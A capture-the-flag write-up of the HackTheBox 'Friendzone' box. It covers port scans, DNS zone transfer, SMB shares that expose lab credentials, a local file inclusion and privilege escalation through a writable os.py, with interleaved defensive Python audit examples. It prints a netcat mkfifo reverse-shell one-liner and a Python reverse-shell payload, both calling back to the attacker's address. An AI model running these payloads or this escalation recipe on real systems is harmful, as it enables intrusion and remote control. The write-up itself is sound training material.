Friendzone | HTB | OSCP | Box 11

Part of TJ Null OSCP-like Box Series

Tanzil Rehman

--

Enumeration

NMAP

┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# nmap -A -sV -sC -O -p- 10.10.10.123
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-02 03:40 EDT
Nmap scan report for 10.10.10.123
Host is up (0.10s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/2%OT=21%CT=1%CU=36889%PV=Y%DS=2%DC=T%G=Y%TM=6180ED1
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=A)SEQ
OS:(SP=FB%GCD=1%ISR=104%TI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54D
OS:NNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W
OS:3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=
OS:Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=N)T7(R=Y%DF=
OS:Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G
OS:%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -37m42s, deviation: 1h09m16s, median: 2m16s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2021-11-02T09:49:37+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-11-02T07:49:37
|_ start_date: N/A
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 112.29 ms 10.10.14.1
2 113.33 ms 10.10.10.123
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 402.29 seconds

Port 21 — vsftpd 3.0.3
Port 22 — OpenSSH 7.6p1 Ubuntu 4
Port 53 — ISC BIND 9.11.3-1ubuntu1.2
Port 80 — Apache httpd 2.4.29
Port 139 — netbios-ssn Samba smbd 3.X — 4.X
Port 443 — Apache httpd 2.4.29
Port 445 — netbios-ssn Samba smbd 4.7.6-Ubuntu

Port 21

Anonymous login not allowed

DNS ( Port 53)

I found the domain friendzone.red via the certificate on port 443, but to keep this write-up organised I am putting everything related to port 53 here.

The following command gave me more interesting domains:

Then, I focused on friendzoneportal.red:

friendzone.red
administrator1.friendzone.red
hr.friendzone.red
uploads.friendzone.red
admin.friendzoneportal.red
files.friendzoneportal.red
imports.friendzoneportal.red
vpn.friendzoneportal.red

Added all of them to /etc/hosts
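The step above (pull the zone's host names out of the DNS server's answer and map them all to the box in /etc/hosts) is easy to script. The following is an added example, not part of the original write-up: it parses dig-style zone-transfer output, confirms the transfer was complete (a full AXFR is framed by the SOA record at both ends) and emits /etc/hosts lines pointing every name at the target. The sample output and its record values are constructed for the example; only the host names come from the page.

```python
import re

# Constructed sample in the format dig prints for "dig axfr <zone> @<server>".
# Record values are placeholders, not the box's real zone data.
SAMPLE_AXFR = """\
; <<>> DiG 9.16.15-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red.                604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.                604800  IN  NS    localhost.
friendzone.red.                604800  IN  A     127.0.0.1
administrator1.friendzone.red. 604800  IN  A     127.0.0.1
hr.friendzone.red.             604800  IN  A     127.0.0.1
uploads.friendzone.red.        604800  IN  A     127.0.0.1
friendzone.red.                604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 100 msec
"""

# name  ttl  IN  type  rdata
RECORD_RE = re.compile(r"^(?P<name>\S+)\s+\d+\s+IN\s+(?P<type>[A-Z]+)\s+(?P<rdata>.*)$")


def parse_axfr(text):
    """Return (name, type, rdata) tuples for every resource record in dig output."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):   # comments and dig's own chatter
            continue
        m = RECORD_RE.match(line)
        if m:
            records.append((m.group("name").rstrip("."), m.group("type"), m.group("rdata")))
    return records


def transfer_succeeded(records):
    """A complete AXFR starts and ends with the zone's SOA record."""
    return len(records) >= 2 and records[0][1] == "SOA" and records[-1][1] == "SOA"


def hosts_entries(text, target_ip):
    """Build /etc/hosts lines mapping every host name in the zone to the target.

    The zone's own A records may point elsewhere (127.0.0.1 in the sample), so the
    caller supplies the address the names should resolve to.
    """
    names = sorted({name for name, rtype, _ in parse_axfr(text) if rtype in ("A", "AAAA", "CNAME")})
    return [f"{target_ip} {name}" for name in names]


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print("zone transfer complete:", transfer_succeeded(recs))
    print("\n".join(hosts_entries(SAMPLE_AXFR, "10.10.10.123")))
```

On the defensive side, a successful transfer from an arbitrary client is the finding itself: BIND should restrict it with `allow-transfer { <secondaries>; };` (or `none;`) in named.conf so only the zone's secondaries can pull the whole zone.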

Port 80 and 443

Landing Page at port 80

Source:

Landing Page at port 443

Certificate at port 443

Added in /etc/hosts file

Visiting the domain over HTTP

source:

There is no data hidden in the picture

Over HTTPS

Source:

Looks like a hint

No idea about it.

Directory Brute Force

https://10.10.10.123

┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# feroxbuster --url http://10.10.10.123 --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o port80.log
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.123
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💾 Output File │ port80.log
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
[####################] - 8m 441090/441090 0s found:2 errors:0
[####################] - 8m 220545/220545 446/s http://10.10.10.123
[####################] - 8m 220545/220545 448/s http://10.10.10.123/wordpress

Found 2:

http://10.10.10.123
http://10.10.10.123/wordpress

***

https://10.10.10.123

┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# feroxbuster --url https://10.10.10.123/ --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -k -o port443.log
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://10.10.10.123/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💾 Output File │ port443.log
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403 11l 32w 301c https://10.10.10.123/server-status
[####################] - 8m 220545/220545 0s found:1 errors:3
[####################] - 8m 220545/220545 444/s https://10.10.10.123/

Found 2

https://10.10.10.123/server-status

***

HTTP://friendzone.red

┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# feroxbuster --url http://friendzone.red --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o friendzone_red.log
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://friendzone.red
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💾 Output File │ friendzone_red.log
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 9l 28w 320c http://friendzone.red/wordpress
403 11l 32w 302c http://friendzone.red/server-status
[####################] - 11m 441090/441090 0s found:2 errors:2058
[####################] - 11m 220545/220545 315/s http://friendzone.red
[####################] - 11m 220545/220545 316/s http://friendzone.red/wordpress

found 2:

http://friendzone.red/wordpress
http://friendzone.red/server-status

I enumerated http://friendzone.red/wordpress/ further, but nothing really was found.

***

https://uploads.friendzone.red

┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# feroxbuster --url https://uploads.friendzone.red/ --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://uploads.friendzone.red/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 9l 28w 334c https://uploads.friendzone.red/files
200 1l 3w 20c https://uploads.friendzone.red/files/note
[####################] - 3m 441090/441090 0s found:2 errors:301545
[####################] - 3m 220545/220545 965/s https://uploads.friendzone.red/
[####################] - 3m 220545/220545 971/s https://uploads.friendzone.red/files

I experimented with it by uploading files and tried to find a way to call the uploaded file, but found nothing useful.

I did a lot of directory brute forcing on the various domains and subpages I found (it's not worth including details or screenshots, as those played no role in compromising this box).

***

Port 445

I found creds.txt

admin:WORKWORKHhallelujah@#

Further, I wanted to make sure I had no access to the Files directory.

To get more information about the shares, I ran the following nmap command:

nmap --script smb-enum-shares -p 139,445 10.10.10.123

Output:

┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# nmap --script smb-enum-shares -p 139,445 10.10.10.123
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-04 04:00 EDT
Nmap scan report for friendzone.red (10.10.10.123)
Host is up (0.11s latency).

PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 1
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 26.64 seconds

This gave me some idea of the location of the shares on the target system.
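The scan output above is worth turning into a repeatable check: which shares let an unauthenticated (guest) session write? The following is an added example, not part of the original write-up or of nmap: it parses the smb-enum-shares block and lists every share whose "Anonymous access" includes WRITE. The sample text is the scan output shown above, copied verbatim.

```python
import re

# The smb-enum-shares output from the scan above (nmap output, not constructed).
SAMPLE_SCAN = r"""
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 1
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
"""

# A share header looks like \\host\share: once the "| " prefix is removed.
SHARE_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\(?P<share>[^:]+):$")


def parse_smb_enum_shares(text):
    """Map share name -> {attribute: value} from nmap's smb-enum-shares output."""
    shares = {}
    current = None
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").strip()      # drop nmap's "| " / "|_ " tree prefix
        m = SHARE_RE.match(line)
        if m:
            current = m.group("share")
            shares[current] = {}
            continue
        if current and ": " in line:
            key, value = line.split(": ", 1)
            shares[current][key] = value
    return shares


def anonymous_writable(shares):
    """Names of shares a guest session may write to, in sorted order."""
    return sorted(name for name, attrs in shares.items()
                  if "WRITE" in attrs.get("Anonymous access", ""))


if __name__ == "__main__":
    parsed = parse_smb_enum_shares(SAMPLE_SCAN)
    for name in anonymous_writable(parsed):
        print(f"{name}: anonymous {parsed[name]['Anonymous access']} at {parsed[name].get('Path')}")
```

Besides listing shares, the parser keeps the Path attribute, which is what revealed the on-disk locations (/etc/Development, /etc/general) that matter later; on a hardened Samba host, guest writable shares would be the first thing this check flags.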

Precursor to Initial foothold

HTTPS://administrator1.friendzone.red

There was a login page (I used the creds I found during SMB share enumeration).

As it said, when I added:

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

I tried to use the timestamp (which I got from uploads.friendzone.red when I uploaded a test.php file, as shown above):

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=1636104675

Except for the timestamp, everything is the same.

I played with this domain further.

┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# feroxbuster --url https://administrator1.friendzone.red/ --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://administrator1.friendzone.red/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 9l 28w 349c https://administrator1.friendzone.red/images
403 11l 32w 318c https://administrator1.friendzone.red/server-status
[####################] - 8m 441090/441090 0s found:2 errors:5

I tried the images page, but found nothing interesting.

But, if I go directly to the page (the page named timestamp):

After many cycles of trial and error, I was able to identify an LFI that gave me an initial foothold.
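The pagename parameter above is the classic shape of a local file inclusion: the server builds a file path from a client-controlled name. The following is an added example, not the box's code (which the write-up never shows) and not anyone's library: it contrasts the naive path construction with a hardened version that only accepts names from a fixed allow-list and, as defence in depth, verifies the resolved path stays under the page directory. PAGE_ROOT and ALLOWED_PAGES are hypothetical values for the example.

```python
import os
import re

PAGE_ROOT = "/var/www/admin/pages"                           # hypothetical
ALLOWED_PAGES = frozenset({"login", "dashboard", "timestamp"})  # hypothetical
NAME_RE = re.compile(r"^[a-z0-9_]{1,32}$")


def vulnerable_page_path(pagename, page_root=PAGE_ROOT):
    """The pattern behind include($_GET['pagename'] . '.php'): the client's value
    is used as-is, so '../' sequences walk out of the page directory."""
    return page_root + "/" + pagename + ".php"


def resolves_outside_root(path, page_root=PAGE_ROOT):
    """True when a (possibly traversal-laden) path normalises to outside page_root."""
    root = os.path.normpath(page_root)
    return os.path.commonpath([root, os.path.normpath(path)]) != root


def safe_page_path(pagename, page_root=PAGE_ROOT, allowed=ALLOWED_PAGES):
    """Return the page file to include, or None if the name is not an allowed page.

    The allow-list alone closes the hole; the realpath containment check stays as
    a second line of defence in case the list is ever loosened.
    """
    if not NAME_RE.match(pagename) or pagename not in allowed:
        return None
    root = os.path.realpath(page_root)
    candidate = os.path.realpath(os.path.join(root, pagename + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for name in ("timestamp", "../../../../etc/passwd", "evil"):
        print(f"{name!r}: naive -> {vulnerable_page_path(name)}"
              f" (outside root: {resolves_outside_root(vulnerable_page_path(name))}),"
              f" hardened -> {safe_page_path(name)}")
```

The fix that matters is the allow-list: a page selector should never be a free-form path fragment, and the server should map a small set of known names to files rather than concatenating user input into an include.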

Initial Foothold

Reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 4444 >/tmp/f

User.txt

Privilege Escalation

I was able to switch to friend user.

I was able to do that by using the password I found in the /opt/www/mysql_data.conf file.

To get a better shell, I SSHed into the box as friend (the same password worked).

I found an interesting script

We can't really edit this script.

After running a few tools and further enumeration, I noticed that this script is being executed with UID=0 (i.e. as root),

and that the script imports the Python module os, and I found the os.py module to be writable.

Use the following command to find writable Python files:

find / -type f -writable -ls 2>/dev/null | grep python
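The find command above catches the writable file; what it does not show is which privileged script actually imports it. The following is an added example, not part of the original write-up: it reads a Python script's import statements, resolves each module along the same search order the interpreter uses (the script's own directory first, then sys.path) and reports any module file, or containing directory, that group or world can write to. The demo scenario (a job script importing a hypothetical helper module) is constructed in a temporary directory.

```python
import ast
import os
import stat
import sys
import tempfile


def imported_modules(script_path):
    """Top-level module names a script imports (static, via the AST)."""
    with open(script_path) as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def locate_module(name, search_paths):
    """First name.py or name/__init__.py on the search path, as the interpreter would pick it."""
    for directory in search_paths:
        for candidate in (os.path.join(directory, name + ".py"),
                          os.path.join(directory, name, "__init__.py")):
            if os.path.isfile(candidate):
                return candidate
    return None


def writable_reasons(path):
    """Why a non-owner could replace this module: file or directory permission bits."""
    reasons = []
    mode = os.stat(path).st_mode
    if mode & stat.S_IWOTH:
        reasons.append("file is world-writable")
    if mode & stat.S_IWGRP:
        reasons.append("file is group-writable")
    parent = os.stat(os.path.dirname(path) or ".").st_mode
    if parent & stat.S_IWOTH and not parent & stat.S_ISVTX:
        reasons.append("directory is world-writable without sticky bit")
    if parent & stat.S_IWGRP:
        reasons.append("directory is group-writable")
    return reasons


def audit_imports(script_path, search_paths=None):
    """(module, file, reasons) for every imported module a non-owner could overwrite."""
    if search_paths is None:
        # Python searches the script's directory before sys.path, so a writable
        # file there shadows the real module even when site-packages is locked down.
        search_paths = [os.path.dirname(os.path.abspath(script_path))] + sys.path
    findings = []
    for name in imported_modules(script_path):
        location = locate_module(name, search_paths)
        if location is None:
            continue
        reasons = writable_reasons(location)
        if reasons:
            findings.append((name, location, "; ".join(reasons)))
    return findings


def demo_audit(world_writable=True):
    """Constructed scenario: job.py imports helper.py, which is (or is not) world-writable."""
    workdir = tempfile.mkdtemp()                   # created mode 0700, so no directory findings
    helper = os.path.join(workdir, "helper.py")    # hypothetical module name
    with open(helper, "w") as fh:
        fh.write("def report():\n    return 'ok'\n")
    os.chmod(helper, 0o666 if world_writable else 0o644)
    script = os.path.join(workdir, "job.py")       # hypothetical privileged script
    with open(script, "w") as fh:
        fh.write("import os\nimport helper\nprint(helper.report())\n")
    return [(name, reason) for name, _, reason in audit_imports(script, [workdir])]


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    findings = audit_imports(target) if target else demo_audit()
    for finding in findings:
        print(finding)
```

Run it against a script that a root cron job or service executes; any finding is a privilege-escalation path, and the fix is the same as for this box: module files under the standard library and site-packages owned by root and mode 644, with their directories not writable by anyone else.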

I added the following code to the os module. It's a reverse shell.

# Appended to the writable os.py: inside that module dup2 is already in scope,
# so no os. prefix is needed.
import pty
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.8",4455))
# point stdin, stdout and stderr at the socket, then spawn a pty'd bash
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()

I got the shell back.

The shell was indeed horrible, but I got root.txt.

root.txt
